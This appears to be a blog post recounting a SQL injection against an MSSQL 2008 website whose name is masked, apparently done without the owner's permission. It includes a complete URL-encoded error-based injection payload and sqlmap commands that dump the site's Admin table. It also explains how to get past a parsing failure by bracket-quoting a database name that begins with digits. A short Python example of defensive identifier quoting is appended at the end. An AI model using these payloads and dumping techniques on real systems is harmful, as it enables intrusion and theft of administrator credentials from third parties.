Sqlmap Injection Detection Experience 0x01

Source: Internet
Author: User

One day I came across a SQL injection point: MSSQL 2008, with error messages turned on.
I threw it straight into sqlmap and everything ran smoothly. Unexpectedly, the account even had sa privileges, so I thought my luck was really good and that everything would be settled.
The databases, tables and columns were all listed, but the --dump parameter would not work no matter what.
The error was "Unable to retrieve the number of entries for table 'Admin' in database '2012_xxxx'" (the x's are masking :)
I thought it should be easy to fix, so I looked up manual injection methods and tested them, without result.
So I went back to sqlmap and ran -h to view the help. I found that the -v parameter sets the output verbosity. Set to -v 3, it shows the payload. Nice. Set straight to -v 5, it provides the entire HTTP request. No wonder it failed: the response was a 500, and opening the full payload in Firefox showed a syntax error.

http://www.xxxx.cn/xxx/detail.aspx?id=218%20and%204416%3dconvert%28int%2c%28select%20char%28113%29%2bchar%28115%29%2bchar%28119%29%2bchar%28100%29%2bchar%28113%29%2b%28select%20isnull%28cast%28count%28*%29%20as%20nvarchar%284000%29%29%2cchar%2832%29%29%20from%20%222012_xxxx%22..syscolumns%2c2012_xxxx.sysobjects%20where%202012_xxxx.syscolumns.id%3d2012_xxxx.sysobjects.id%20and%202012_xxxx.sysobjects.name%3dchar%2884%29%2bchar%2866%29%2bchar%2895%29%2bchar%2865%29%2bchar%28100%29%2bchar%28109%29%2bchar%28105%29%2bchar%28110%29%29%2bchar%28113%29%2bchar%28107%29%2bchar%28122%29%2bchar%28104%29%2bchar%28113%29%29%29

The problem is obviously the 2012: the number at the start of the database name is wrongly treated as a parameter.

After wrapping the database name in the URL in double quotes, the data came out, sure enough.

The next problem: I can't pull all the data out manually, so I still had to go back to sqlmap. That meant finding a way to wrap the database name so that the system does not parse it as a parameter.

TEST1: ./sqlmap.py -u http://www.xxxx.cn/xxxx/detail.aspx?id=218 --dump -D '"2012_xxxx"' -T 'Admin'

This time it was better, but still an error: Unable to retrieve column names for table 'Admin' in database '"2012_xxxx"'. It means something was returned, but the database name was not correct.

TEST2: ./sqlmap.py -u http://www.xxxx.cn/broadband/detail.aspx?id=218 --dump -D "[2012_xxxx]" -T 'Admin'

I don't remember where the idea came from, but I wrapped the name in square brackets and, sure enough, it succeeded and dumped the entire table.

Conclusion: when using sqlmap, you can use the -v parameter to set the output verbosity, then open the payload directly in the browser, identify where the syntax error is and try to fix it. When the system misparses a database name, wrap the name in square brackets.
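
The failure above follows from T-SQL's identifier rules: a name that starts with a digit, such as 2012_xxxx, is not a regular identifier and must be delimited. The Python sketch below is an added example, not part of the original post or of sqlmap; the function names are hypothetical and the reserved-word list is a small constructed subset.

```python
import re

# First character: letter, underscore, @ or #. Later characters may also be
# digits or $. A name such as 2012_xxxx fails on its first character.
_REGULAR = re.compile(r"(?:[^\W\d]|[@#])[\w@#$]*")

# Constructed subset of T-SQL reserved keywords, enough for the illustration.
_RESERVED = {"select", "from", "where", "table", "user", "order", "group"}

MAX_SYSNAME = 128  # sysname length limit in SQL Server


def is_regular_identifier(name: str) -> bool:
    """True if the name can be written in T-SQL without delimiters."""
    return bool(_REGULAR.fullmatch(name)) and name.lower() not in _RESERVED


def quote_identifier(name: str) -> str:
    """Bracket-delimit a name the way QUOTENAME does: ] becomes ]]."""
    if not name or len(name) > MAX_SYSNAME:
        raise ValueError("identifier must be 1..128 characters")
    return "[" + name.replace("]", "]]") + "]"


def qualify(database: str, table: str, schema: str = "") -> str:
    """Build database.schema.table; an empty schema gives database..table."""
    middle = quote_identifier(schema) if schema else ""
    return ".".join([quote_identifier(database), middle, quote_identifier(table)])


if __name__ == "__main__":
    # Constructed sample names, including the masked database name from the post.
    for name in ("Admin", "2012_xxxx", "order", "odd]name"):
        print(name, is_regular_identifier(name), quote_identifier(name))
    print(qualify("2012_xxxx", "syscolumns"))
```

Code that assembles dynamic T-SQL from object names should always delimit them this way, or call QUOTENAME on the server side, rather than concatenating the raw name.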
